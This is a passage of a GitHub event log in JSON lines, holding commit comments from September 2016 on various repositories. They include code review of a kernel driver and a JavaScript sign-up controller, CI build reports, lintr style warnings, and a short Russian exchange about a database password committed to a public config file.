{"id":"4585437099","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19083917,"position":null,"line":null,"path":null,"commit_id":"5bec328f2edfb9c36bfe2fbf28b433b7b92c8463","created_at":"2016-09-19T19:37:07Z","updated_at":"2016-09-19T19:37:07Z","body":"\r\nIt's definitely a bad idea, but it's not a good idea either to start breaking up CommProto just to make our wrapper happy."}},"created_at":"2016-09-19T19:37:07Z"}
{"id":"4585437207","type":"CommitCommentEvent","actor":{"login":"x8BitRain"},"repo":{"name":"coopersimon/PSXEmu"},"payload":{"comment":{"id":19083918,"position":null,"line":null,"path":null,"commit_id":"48553bc3cfd3e7cb9e76e47d2ec039e06f58014a","created_at":"2016-09-19T19:37:09Z","updated_at":"2016-09-19T19:37:09Z","body":"How complete is this emulator? 40%? 70%?"}},"created_at":"2016-09-19T19:37:09Z"}
{"id":"4585438643","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19083923,"position":null,"line":null,"path":null,"commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T19:37:24Z","updated_at":"2016-09-19T19:37:24Z","body":"Tests are failing."}},"created_at":"2016-09-19T19:37:24Z"}
{"id":"4585441944","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19083932,"position":null,"line":null,"path":null,"commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T19:38:02Z","updated_at":"2016-09-19T19:38:02Z","body":"64 linter warnings."}},"created_at":"2016-09-19T19:38:02Z"}
{"id":"4585442739","type":"CommitCommentEvent","actor":{"login":"mrose17"},"repo":{"name":"brave/ledger-publisher"},"payload":{"comment":{"id":19083934,"position":null,"line":null,"path":null,"commit_id":"4316ca9050abb77bdd7d03b41206238435bdea46","created_at":"2016-09-19T19:38:11Z","updated_at":"2016-09-19T19:38:11Z","body":"Aldo, I suggest that the glob pattern be [0-9]*.js"}},"created_at":"2016-09-19T19:38:11Z"}
{"id":"4585443445","type":"CommitCommentEvent","actor":{"login":"clarissacastella"},"repo":{"name":"meedan/meedan-code"},"payload":{"comment":{"id":19083939,"position":1,"line":1,"path":"_posts/2016-09-19.md","commit_id":"1474ca7f2ecda927287d2bc12e9909358b3ab6d4","created_at":"2016-09-19T19:38:19Z","updated_at":"2016-09-19T19:38:19Z","body":"You need to update that instruction on README.md"}},"created_at":"2016-09-19T19:38:19Z"}
{"id":"4585448368","type":"CommitCommentEvent","actor":{"login":"sergeyklay"},"repo":{"name":"Yakovlev-Melarn/directantic"},"payload":{"comment":{"id":19083962,"position":22,"line":11,"path":"directantic/app/config/config.php","commit_id":"74898b57b3a3579823f80b00ec01495041aa363c","created_at":"2016-09-19T19:39:16Z","updated_at":"2016-09-19T19:39:16Z","body":"Мне кажется это несколько самонадеянным, держать пароль от базы в открытом репозитории, надеясь что к серверу никто не проберется"}},"created_at":"2016-09-19T19:39:16Z"}
{"id":"4585449144","type":"CommitCommentEvent","actor":{"login":"maboc"},"repo":{"name":"maboc/sql"},"payload":{"comment":{"id":19083965,"position":null,"line":null,"path":null,"commit_id":"f79365d3f7c38d6a657c52682015c1675e0e7929","created_at":"2016-09-19T19:39:25Z","updated_at":"2016-09-19T19:39:25Z","body":"netjes hoor"}},"created_at":"2016-09-19T19:39:25Z"}
{"id":"4585449751","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19083968,"position":null,"line":null,"path":null,"commit_id":"a19ddcc005bd09857724e451c8c241b5e1660b8e","created_at":"2016-09-19T19:39:32Z","updated_at":"2016-09-19T19:39:32Z","body":"develop (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (1766 of 1766 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-19T19:39:32Z"}
{"id":"4585449962","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19083970,"position":null,"line":null,"path":null,"commit_id":"5bec328f2edfb9c36bfe2fbf28b433b7b92c8463","created_at":"2016-09-19T19:39:35Z","updated_at":"2016-09-19T19:39:35Z","body":"I prefer this wau because c++ is not technically c, the clr crap forces xbee lib to become c++ which doesnt allow implicit type conersions of void ( which our xbee files are full of) and it bitches about operator overloading of &  and |. If i made them cpp manually, it wont solve the problem"}},"created_at":"2016-09-19T19:39:35Z"}
{"id":"4585453112","type":"CommitCommentEvent","actor":{"login":"bryangw1"},"repo":{"name":"KCLegalHackers/CodingForLawyers"},"payload":{"comment":{"id":19083978,"position":null,"line":null,"path":null,"commit_id":"24f0173a3521315b34ecd00754b4e57d47fd3772","created_at":"2016-09-19T19:40:13Z","updated_at":"2016-09-19T19:40:13Z","body":"@CSBCounsel I've sent you an invitation for owner access. That should permit you to update files w/o having to create a pull request"}},"created_at":"2016-09-19T19:40:13Z"}
{"id":"4585454723","type":"CommitCommentEvent","actor":{"login":"niklasHagner"},"repo":{"name":"niklasHagner/Style-Showcase"},"payload":{"comment":{"id":19083984,"position":null,"line":null,"path":null,"commit_id":"b8ac3186b0fc257ea5a5c7ebcdb5434b1c917380","created_at":"2016-09-19T19:40:30Z","updated_at":"2016-09-19T19:40:30Z","body":"👍 Increased security!"}},"created_at":"2016-09-19T19:40:30Z"}
{"id":"4585455024","type":"CommitCommentEvent","actor":{"login":"jrevels"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19083985,"position":null,"line":null,"path":null,"commit_id":"0408085d74158e00515ec539143eee3c47365ce2","created_at":"2016-09-19T19:40:33Z","updated_at":"2016-09-19T19:40:33Z","body":"[Gotta add an `@` before commit SHAs](https://github.com/JuliaCI/Nanosoldier.jl#trigger-syntax):\r\n\r\n@nanosoldier `runbenchmarks(ALL, vs = \"@dab390ccd2e8d57e7450d72b1c51286530340ae7\")`"}},"created_at":"2016-09-19T19:40:33Z"}
{"id":"4585455260","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19083986,"position":13,"line":13,"path":"browser/js/user/user.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T19:40:36Z","updated_at":"2016-09-19T19:40:36Z","body":"This looks like debug code."}},"created_at":"2016-09-19T19:40:36Z"}
{"id":"4585456346","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19083989,"position":16,"line":16,"path":"browser/js/user/user.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T19:40:48Z","updated_at":"2016-09-19T19:40:48Z","body":"More debug code."}},"created_at":"2016-09-19T19:40:48Z"}
{"id":"4585457756","type":"CommitCommentEvent","actor":{"login":"wakaleo"},"repo":{"name":"vikrantdheer/screenplay-exercises"},"payload":{"comment":{"id":19084000,"position":38,"line":38,"path":"src/main/java/serenitylabs/tutorials/trains/tasks/ViewTheAvailableTickets.java","commit_id":"c5e7d434b45c4aeb25902099b3adf62d48d892bc","created_at":"2016-09-19T19:41:04Z","updated_at":"2016-09-19T19:41:04Z","body":"Never refer to locators, CSS selectors, IDs, XPath etc in a task; it runs the risk of duplication and violates the role -> task -> interaction layering. All locators should be placed in Page Object/Component classes like your `JourneySummary` class, never in task classes. The task classes then refer to the locators defined in these Page Object/Component classes."}},"created_at":"2016-09-19T19:41:04Z"}
{"id":"4585457938","type":"CommitCommentEvent","actor":{"login":"Yakovlev-Melarn"},"repo":{"name":"Yakovlev-Melarn/directantic"},"payload":{"comment":{"id":19084002,"position":22,"line":11,"path":"directantic/app/config/config.php","commit_id":"74898b57b3a3579823f80b00ec01495041aa363c","created_at":"2016-09-19T19:41:06Z","updated_at":"2016-09-19T19:41:06Z","body":"Да пусть пробиваются кому времени не жаль :) Это workspace - дамп поднять мне времени меньше минуты если вдруг поломают :)"}},"created_at":"2016-09-19T19:41:06Z"}
{"id":"4585460797","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19084010,"position":null,"line":null,"path":null,"commit_id":"5bec328f2edfb9c36bfe2fbf28b433b7b92c8463","created_at":"2016-09-19T19:41:36Z","updated_at":"2016-09-19T19:41:36Z","body":"Using attie's library would be easier, but that would require us to compile it, and link it. I would need to make a cmake file for it, and it looks like it will definitely not be fun trying to figure the structure of it lulz"}},"created_at":"2016-09-19T19:41:36Z"}
{"id":"4585460885","type":"CommitCommentEvent","actor":{"login":"agata-sm"},"repo":{"name":"SciLifeLab/courses"},"payload":{"comment":{"id":19084011,"position":null,"line":null,"path":null,"commit_id":"62a0cdbed1f244771a21a9c5b5ca49053fda034c","created_at":"2016-09-19T19:41:38Z","updated_at":"2016-09-19T19:41:38Z","body":"This is the last version that was rendered on the course website."}},"created_at":"2016-09-19T19:41:38Z"}
{"id":"4585463686","type":"CommitCommentEvent","actor":{"login":"rminnich"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19084078,"position":23,"line":485,"path":"kern/arch/x86/x86.h","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-19T19:42:07Z","updated_at":"2016-09-19T19:42:07Z","body":"because it's an inline. note that static. This way it can inline, but if inlining is turned off, it will still work. You can't link to a function defined static."}},"created_at":"2016-09-19T19:42:07Z"}
{"id":"4585464658","type":"CommitCommentEvent","actor":{"login":"rminnich"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19084101,"position":25,"line":487,"path":"kern/arch/x86/x86.h","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-19T19:42:17Z","updated_at":"2016-09-19T19:42:17Z","body":"Why are these commented out?"}},"created_at":"2016-09-19T19:42:17Z"}
{"id":"4585466272","type":"CommitCommentEvent","actor":{"login":"rthalley"},"repo":{"name":"rthalley/dnspython"},"payload":{"comment":{"id":19084130,"position":5,"line":18,"path":".travis.yml","commit_id":"58e84f91047966ad36562cd19bd89c38680f3d8c","created_at":"2016-09-19T19:42:34Z","updated_at":"2016-09-19T19:42:34Z","body":"\n> On Sep 19, 2016, at 12:15, Sebastian <notifications@github.com> wrote:\n> \n> Tests are not run without these optional modules. I can send a PR which adds additional builds, where these are not built. (See Build Matrix <https://docs.travis-ci.com/user/customizing-the-build#build-matrix>)\n> \n> \n\nSure, though I think just 2.7 and 3.5 would be enough"}},"created_at":"2016-09-19T19:42:34Z"}
{"id":"4585467338","type":"CommitCommentEvent","actor":{"login":"rminnich"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19084157,"position":14,"line":189,"path":"kern/drivers/dev/sdiahci.c","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-19T19:42:45Z","updated_at":"2016-09-19T19:42:45Z","body":"virtual addresses should alway be void *."}},"created_at":"2016-09-19T19:42:45Z"}
{"id":"4585468101","type":"CommitCommentEvent","actor":{"login":"mfaywu"},"repo":{"name":"mfaywu/job-search-tool"},"payload":{"comment":{"id":19084184,"position":null,"line":null,"path":null,"commit_id":"b21d72ab399e79654df4c26bfa137ea7bd16c3cc","created_at":"2016-09-19T19:42:54Z","updated_at":"2016-09-19T19:42:54Z","body":"#8 now Task consists of {text: String, date: Date}"}},"created_at":"2016-09-19T19:42:54Z"}
{"id":"4585468472","type":"CommitCommentEvent","actor":{"login":"rminnich"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19084193,"position":5,"line":147,"path":"kern/drivers/dev/sdiahci.c","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-19T19:42:57Z","updated_at":"2016-09-19T19:42:57Z","body":"If this is a virtual address it should be void *"}},"created_at":"2016-09-19T19:42:57Z"}
{"id":"4585469076","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084200,"position":7,"line":7,"path":"browser/js/signUp/signUp.html","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T19:43:04Z","updated_at":"2016-09-19T19:43:04Z","body":"Good to see you using an object on the scope (`user`) instead of primitives."}},"created_at":"2016-09-19T19:43:04Z"}
{"id":"4585469677","type":"CommitCommentEvent","actor":{"login":"incanus"},"repo":{"name":"mapbox/mapbox-gl-native"},"payload":{"comment":{"id":19084203,"position":null,"line":null,"path":null,"commit_id":"940124ff713a960d7f70071779dd37d07010fa80","created_at":"2016-09-19T19:43:11Z","updated_at":"2016-09-19T19:43:11Z","body":"Grr, disregard. Restarting Xcode seems to fix this. \r\n\r\n![](https://cdn.meme.am/instances/500x/71810411.jpg)"}},"created_at":"2016-09-19T19:43:11Z"}
{"id":"4585470105","type":"CommitCommentEvent","actor":{"login":"rminnich"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19084205,"position":29,"line":205,"path":"kern/drivers/dev/sdiahci.c","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-19T19:43:16Z","updated_at":"2016-09-19T19:43:16Z","body":"physical? virtual?"}},"created_at":"2016-09-19T19:43:16Z"}
{"id":"4585471001","type":"CommitCommentEvent","actor":{"login":"farhaenis"},"repo":{"name":"farhaenis/demo_apps"},"payload":{"comment":{"id":19084207,"position":2,"line":2,"path":"hello_world_sample_app/templates/hello.hdbs","commit_id":"36adc3f20bc4616c138ee8672a89c8cda43f9a33","created_at":"2016-09-19T19:43:26Z","updated_at":"2016-09-19T19:43:26Z","body":"<h2>{{t \"hello.main\"}} {{username}}</h2>"}},"created_at":"2016-09-19T19:43:26Z"}
{"id":"4585473319","type":"CommitCommentEvent","actor":{"login":"dollar2048"},"repo":{"name":"ewgRa/de_faq"},"payload":{"comment":{"id":19084216,"position":14,"line":36,"path":"Авто.md","commit_id":"887ae7afb2c56df2751f4b99e4e29e815c76b038","created_at":"2016-09-19T19:43:52Z","updated_at":"2016-09-19T19:43:52Z","body":"@apoleshchuk DriveNow Berlin во почти всех БМВ лежат в багажнике бустеры для детей. в Мини нет их точно. к тому же бустер можно купить в магазе за 10 евро. мы так и сделали. "}},"created_at":"2016-09-19T19:43:52Z"}
{"id":"4585473813","type":"CommitCommentEvent","actor":{"login":"wakaleo"},"repo":{"name":"vikrantdheer/screenplay-exercises"},"payload":{"comment":{"id":19084219,"position":13,"line":66,"path":"pom.xml","commit_id":"c5e7d434b45c4aeb25902099b3adf62d48d892bc","created_at":"2016-09-19T19:43:58Z","updated_at":"2016-09-19T19:43:58Z","body":"These are Selenium 3 dependencies, so slightly risky - Serenity won't be upgraded to Selenium 3 until the official version comes out."}},"created_at":"2016-09-19T19:43:58Z"}
{"id":"4585474722","type":"CommitCommentEvent","actor":{"login":"sergeyklay"},"repo":{"name":"Yakovlev-Melarn/directantic"},"payload":{"comment":{"id":19084220,"position":22,"line":11,"path":"directantic/app/config/config.php","commit_id":"74898b57b3a3579823f80b00ec01495041aa363c","created_at":"2016-09-19T19:44:09Z","updated_at":"2016-09-19T19:44:09Z","body":"А с чего ты решил что будут ломать?"}},"created_at":"2016-09-19T19:44:09Z"}
{"id":"4585478074","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084265,"position":1,"line":1,"path":"browser/js/signUp/signUp.controller.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T19:44:43Z","updated_at":"2016-09-19T19:44:43Z","body":"Any reason this cannot be named `SignupController` (or just `Signup`?"}},"created_at":"2016-09-19T19:44:43Z"}
{"id":"4585478526","type":"CommitCommentEvent","actor":{"login":"Ste74"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":19084271,"position":null,"line":null,"path":null,"commit_id":"c520bf73a35d9528c6b912476a969eace593b3a1","created_at":"2016-09-19T19:44:46Z","updated_at":"2016-09-19T19:44:46Z","body":":smile: thank you @philmmanjaro with both array work.. another tip for me :wink: "}},"created_at":"2016-09-19T19:44:46Z"}
{"id":"4585480318","type":"CommitCommentEvent","actor":{"login":"rminnich"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19084300,"position":48,"line":241,"path":"kern/drivers/dev/sdiahci.c","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-19T19:45:07Z","updated_at":"2016-09-19T19:45:07Z","body":"it's already a uintptr_t, why are you casting it?"}},"created_at":"2016-09-19T19:45:07Z"}
{"id":"4585480348","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084302,"position":12,"line":12,"path":"browser/js/signUp/signUp.controller.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T19:45:08Z","updated_at":"2016-09-19T19:45:08Z","body":"Don't forget to `catch`"}},"created_at":"2016-09-19T19:45:08Z"}
{"id":"4585481881","type":"CommitCommentEvent","actor":{"login":"kevin-wittmer"},"repo":{"name":"robotics-at-maryland/qubo"},"payload":{"comment":{"id":19084315,"position":49,"line":48,"path":"src/vl_qubo/ahrs/src/ahrs_qubo.cpp","commit_id":"191a1ec45aa291cb0281df6c04e9571a4caa0499","created_at":"2016-09-19T19:45:24Z","updated_at":"2016-09-19T19:45:24Z","body":"I would like to see if we can figure out the right values for the covariance matrices because -1's screw up the Kalman filter."}},"created_at":"2016-09-19T19:45:24Z"}
{"id":"4585482856","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19084329,"position":null,"line":null,"path":null,"commit_id":"5bec328f2edfb9c36bfe2fbf28b433b7b92c8463","created_at":"2016-09-19T19:45:36Z","updated_at":"2016-09-19T19:45:36Z","body":"At this point, there is no easy way of doing this. Compiling the commproto library first will at least spare us the headache of clr ."}},"created_at":"2016-09-19T19:45:36Z"}
{"id":"4585483336","type":"CommitCommentEvent","actor":{"login":"AndreyAkinshin"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19084333,"position":null,"line":null,"path":null,"commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T19:45:41Z","updated_at":"2016-09-19T19:45:41Z","body":"@adamsitnik, I made requested fixes: https://github.com/PerfDotNet/BenchmarkDotNet/commit/dfcc984e12007d2234f6fffebcfcc6357bac1a2b"}},"created_at":"2016-09-19T19:45:41Z"}
{"id":"4585485700","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084359,"position":5,"line":5,"path":"browser/js/signUp/signUp.controller.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T19:46:04Z","updated_at":"2016-09-19T19:46:04Z","body":"Controllers shouldn't really know implementation details, and `localStorage` is definitely an implementation detail. Maybe use a `localStorage` factory — or even better, the `CartFactory` uses the `localStorage` factory."}},"created_at":"2016-09-19T19:46:04Z"}
{"id":"4585487006","type":"CommitCommentEvent","actor":{"login":"rminnich"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19084391,"position":134,"line":422,"path":"kern/drivers/dev/sdiahci.c","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-19T19:46:18Z","updated_at":"2016-09-19T19:46:18Z","body":"This style makes sense."}},"created_at":"2016-09-19T19:46:18Z"}
{"id":"4585487058","type":"CommitCommentEvent","actor":{"login":"ashfurrow"},"repo":{"name":"Moya/Moya"},"payload":{"comment":{"id":19084393,"position":null,"line":null,"path":null,"commit_id":"7c41718d1fe2a1e8616264c3361154d9df566e97","created_at":"2016-09-19T19:46:18Z","updated_at":"2016-09-19T19:46:18Z","body":"Cool! I've already merged swift-3.0 into master, want to issue a PR or merge into master manually? "}},"created_at":"2016-09-19T19:46:18Z"}
{"id":"4585487070","type":"CommitCommentEvent","actor":{"login":"Yakovlev-Melarn"},"repo":{"name":"Yakovlev-Melarn/directantic"},"payload":{"comment":{"id":19084394,"position":22,"line":11,"path":"directantic/app/config/config.php","commit_id":"74898b57b3a3579823f80b00ec01495041aa363c","created_at":"2016-09-19T19:46:18Z","updated_at":"2016-09-19T19:46:18Z","body":"Ну а на кой ещё туда лазить? Всем любопытствующим я могу дамп и на гите выложить)) В общем нет никакой практической пользы утаивать доступы к базе - потому и не стал расточительно тратить время на сокрытие этих данных )"}},"created_at":"2016-09-19T19:46:18Z"}
{"id":"4585489068","type":"CommitCommentEvent","actor":{"login":"rminnich"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19084419,"position":153,"line":449,"path":"kern/drivers/dev/sdiahci.c","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-19T19:46:39Z","updated_at":"2016-09-19T19:46:39Z","body":"TODO? Looks you did it? :-)"}},"created_at":"2016-09-19T19:46:39Z"}
{"id":"4585492955","type":"CommitCommentEvent","actor":{"login":"rminnich"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19084457,"position":163,"line":458,"path":"kern/drivers/dev/sdiahci.c","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-19T19:47:22Z","updated_at":"2016-09-19T19:47:22Z","body":"You need to figure this one out. Look it up in the docs and add a comment here. But I think by commenting this out you've made it so IO will never start."}},"created_at":"2016-09-19T19:47:22Z"}
{"id":"4585493905","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084463,"position":10,"line":10,"path":"browser/js/signUp/signUp.controller.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T19:47:33Z","updated_at":"2016-09-19T19:47:33Z","body":"Another thing — when a user signs up, it's not the responsibility of the controller to make sure that the signed-in user's cart gets merged in. What if the user signs up through some alternative means / from another state? This kind of logic definitely belongs to the `AuthService.signup` method."}},"created_at":"2016-09-19T19:47:33Z"}
{"id":"4585494802","type":"CommitCommentEvent","actor":{"login":"joaoe"},"repo":{"name":"Ensembl/VEP_plugins"},"payload":{"comment":{"id":19084470,"position":null,"line":null,"path":null,"commit_id":"bf425dba599ff5d5359b0481a5b1df8afc943da7","created_at":"2016-09-19T19:47:43Z","updated_at":"2016-09-19T19:47:43Z","body":"Since we have this \r\n```\r\n my $cds_seq = defined($tr->{_variation_effect_feature_cache}) ? $tr->{_variation_effect_feature_cache}->{translateable_seq} : $tr->translateable_seq;\r\n```\r\nshould it also be like\r\n```\r\nmy $three_prime_utr = defined($tr->{_variation_effect_feature_cache}) ? $tr->{_variation_effect_feature_cache}->{three_prime_utr} : $tr->three_prime_utr;\r\n```\r\n?"}},"created_at":"2016-09-19T19:47:43Z"}
{"id":"4585495342","type":"CommitCommentEvent","actor":{"login":"bretonics"},"repo":{"name":"bretonics/CHOMP"},"payload":{"comment":{"id":19084477,"position":null,"line":null,"path":null,"commit_id":"60256c01dbb70c0a9ea501a1c0c7ff851a13313e","created_at":"2016-09-19T19:47:48Z","updated_at":"2016-09-19T19:47:48Z","body":"fixes #7 "}},"created_at":"2016-09-19T19:47:48Z"}
{"id":"4585495611","type":"CommitCommentEvent","actor":{"login":"rminnich"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19084480,"position":166,"line":461,"path":"kern/drivers/dev/sdiahci.c","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-19T19:47:51Z","updated_at":"2016-09-19T19:47:51Z","body":"oh nvm it's here.\r\nTODO: replace 7 and 1 by cpp names."}},"created_at":"2016-09-19T19:47:51Z"}
{"id":"4585496555","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19084482,"position":null,"line":null,"path":null,"commit_id":"a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f","created_at":"2016-09-19T19:47:59Z","updated_at":"2016-09-19T19:47:59Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:75:40:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:83:21:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L83) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:46:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:90:18:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:91:18:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:92:18:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:13:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:17:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:16:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               